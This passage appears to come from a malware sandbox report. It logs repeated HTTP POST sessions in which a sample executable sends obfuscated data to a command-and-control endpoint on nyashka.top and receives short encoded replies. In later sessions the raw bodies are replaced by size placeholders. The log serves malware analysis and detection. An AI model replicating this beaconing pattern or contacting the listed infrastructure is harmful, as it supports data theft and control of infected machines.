                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    7 | 192.168.2.7 | 49728 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:15.808602095 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:16.161849022 CEST | 2544 | OUT | Data Raw: 5a 50 5c 57 54 46 54 5d 5b 5f 5a 51 59 50 58 52 57 5b 5d 53 57 51 53 5e 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZP\WTFT][_ZQYPXRW[]SWQS^YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.],+53 6==\<6+;[##W/*)7]40!;>&F$.Y/
                                                                    Aug 21, 2024 10:03:16.510523081 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:16.645663023 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    8 | 192.168.2.7 | 49730 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:16.543946028 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1844
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    9 | 192.168.2.7 | 49733 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:16.988464117 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:17.333632946 CEST | 2544 | OUT | Data Raw: 5f 57 5c 53 51 47 51 5e 5b 5f 5a 51 59 56 58 53 57 5d 5d 59 57 5d 53 59 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _W\SQGQ^[_ZQYVXSW]]YW]SYYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.Y,U3A#-'70!Z=(=9([77 #2'(9'\"#>8&F$.Y/!
                                                                    Aug 21, 2024 10:03:17.670511961 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:17.912044048 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    10 | 192.168.2.7 | 49735 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:18.970951080 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2536
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:19.318097115 CEST | 2536 | OUT | Data Raw: 5f 5c 59 57 54 49 54 5a 5b 5f 5a 51 59 57 58 52 57 5c 5d 52 57 5a 53 5b 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _\YWTITZ[_ZQYWXRW\]RWZS[YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.80 #-;#![*-(^<!Z).+Z#<R4!3?75],&F$.Y/1
                                                                    Aug 21, 2024 10:03:19.654755116 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:19.853583097 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    11 | 192.168.2.7 | 49736 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:20.355128050 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:20.708616018 CEST | 2544 | OUT | Data Raw: 5a 57 59 55 54 43 51 5c 5b 5f 5a 51 59 53 58 5e 57 51 5d 5b 57 5d 53 55 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZWYUTCQ\[_ZQYSX^WQ][W]SUYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U._/3?B#=Y !>-4X?>_+ ,7W$P<#\4=;>&F$.Y/5
                                                                    Aug 21, 2024 10:03:21.048686028 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:21.249675989 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    12 | 192.168.2.7 | 49738 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:21.751533985 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:22.099339008 CEST | 2544 | OUT | Data Raw: 5f 56 5c 5f 51 42 54 5f 5b 5f 5a 51 59 52 58 54 57 5e 5d 58 57 5c 53 58 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _V\_QBT_[_ZQYRXTW^]XW\SXYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-8A6> " :*,+=:([?"<<7$R*9;\#0Y8&F$.Y/1
                                                                    Aug 21, 2024 10:03:22.420949936 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:22.638360023 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    13 | 192.168.2.7 | 49739 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:21.806905031 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1844
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:22.161735058 CEST | 1844 | OUT | Data Raw: 5a 55 5c 50 51 45 54 5e 5b 5f 5a 51 59 56 58 5f 57 59 5d 52 57 5c 53 55 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZU\PQET^[_ZQYVX_WY]RW\SUYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.],!+" 6)=/(]+[$#/0!13?+ 0X/&F$.Y/!
                                                                    Aug 21, 2024 10:03:22.500739098 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:22.728085041 CEST | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 09 1d 25 0e 29 43 2a 1f 26 38 30 19 27 1d 2a 53 2b 3e 23 13 2a 3d 26 05 33 38 39 58 31 10 05 08 27 38 3d 5d 3f 58 3a 53 26 2c 2f 5c 2d 24 2b 5d 0c 13 22 5e 37 14 35 05 25 02 01 03 2a 16 02 04 22 05 36 13 3f 03 3e 0a 3f 3f 28 5b 28 00 3f 11 28 2a 00 1c 2f 06 04 06 2e 20 22 13 23 2e 2b 52 0d 11 24 1d 3f 03 3d 1f 3d 3e 33 5e 35 5e 24 02 30 04 26 50 25 0c 00 55 27 07 2c 10 25 0b 39 55 27 22 3d 55 32 05 31 06 31 06 36 0f 36 32 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: %)C*&80'*S+>#*=&389X1'8=]?X:S&,/\-$+]"^75%*"6?>??([(?(*/. "#.+R$?==>3^5^$0&P%U',%9U'"=U211662#T,"W3UV


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    14 | 192.168.2.7 | 49740 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:23.403815985 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2536
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:23.755608082 CEST | 2536 | OUT | Data Raw: 5f 50 59 54 51 44 54 51 5b 5f 5a 51 59 57 58 50 57 50 5d 5d 57 5c 53 5f 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _PYTQDTQ[_ZQYWXPWP]]W\S_YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/0<#-\ 02>(_<?'\ <P41 +*473!X;.&F$.Y/
                                                                    Aug 21, 2024 10:03:24.097390890 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:24.233509064 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 49742 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:03:24.873002052 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Aug 21, 2024 10:03:25.226041079 CEST | 2544 | OUT | Data Raw: 2544-byte request body
Aug 21, 2024 10:03:25.547121048 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:03:25.766395092 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 21 Aug 2024 08:03:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.7 | 49744 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:03:26.258500099 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Aug 21, 2024 10:03:26.614903927 CEST | 2544 | OUT | Data Raw: 2544-byte request body
Aug 21, 2024 10:03:26.948158979 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:03:27.084918976 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 21 Aug 2024 08:03:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.7 | 49745 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:03:27.304879904 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Aug 21, 2024 10:03:27.661874056 CEST | 2544 | OUT | Data Raw: 2544-byte request body


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.7 | 49747 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:03:27.766567945 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 373292cm.nyashka.top
Content-Length: 1868
Expect: 100-continue
Connection: Keep-Alive
Aug 21, 2024 10:03:28.116282940 CEST | 1868 | OUT | Data Raw: 1868-byte request body
Aug 21, 2024 10:03:28.437407017 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:03:28.645632982 CEST | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 21 Aug 2024 08:03:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
Data Raw: 152-byte response body


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.7 | 49748 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:03:28.151470900 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Aug 21, 2024 10:03:28.506571054 CEST | 2544 | OUT | Data Raw: 2544-byte request body
Aug 21, 2024 10:03:28.855467081 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:03:28.995536089 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 21 Aug 2024 08:03:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.7 | 49749 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:03:29.134613037 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Aug 21, 2024 10:03:29.490113974 CEST | 2544 | OUT | Data Raw: 2544-byte request body
Aug 21, 2024 10:03:29.839284897 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:03:29.975137949 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 21 Aug 2024 08:03:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.7 | 49750 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:03:30.195215940 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Aug 21, 2024 10:03:30.552957058 CEST | 2544 | OUT | Data Raw: 2544-byte request body
Aug 21, 2024 10:03:30.875128031 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:03:31.074687958 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 21 Aug 2024 08:03:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.7 | 49751 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:03:31.285007954 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Aug 21, 2024 10:03:31.631076097 CEST | 2544 | OUT | Data Raw: 2544-byte request body
Aug 21, 2024 10:03:31.961420059 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:03:32.165831089 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 21 Aug 2024 08:03:31 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.7 | 65381 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:03:32.329693079 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Aug 21, 2024 10:03:32.679223061 CEST | 2544 | OUT | Data Raw: 2544-byte request body
Aug 21, 2024 10:03:33.003505945 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:03:33.133506060 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 21 Aug 2024 08:03:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.7 | 65382 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:03:33.476500988 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.7 | 65383 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:03:33.686141968 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 373292cm.nyashka.top
Content-Length: 1868
Expect: 100-continue
Connection: Keep-Alive
Aug 21, 2024 10:03:34.038362980 CEST | 1868 | OUT | Data Raw: 1868-byte request body
Aug 21, 2024 10:03:34.379303932 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:03:34.517278910 CEST | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 21 Aug 2024 08:03:33 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
Data Raw: 152-byte response body


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.7 | 65384 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:03:33.836772919 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Aug 21, 2024 10:03:34.200556040 CEST | 2544 | OUT | Data Raw: 2544-byte request body
Aug 21, 2024 10:03:34.513344049 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:03:34.649585009 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 21 Aug 2024 08:03:34 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


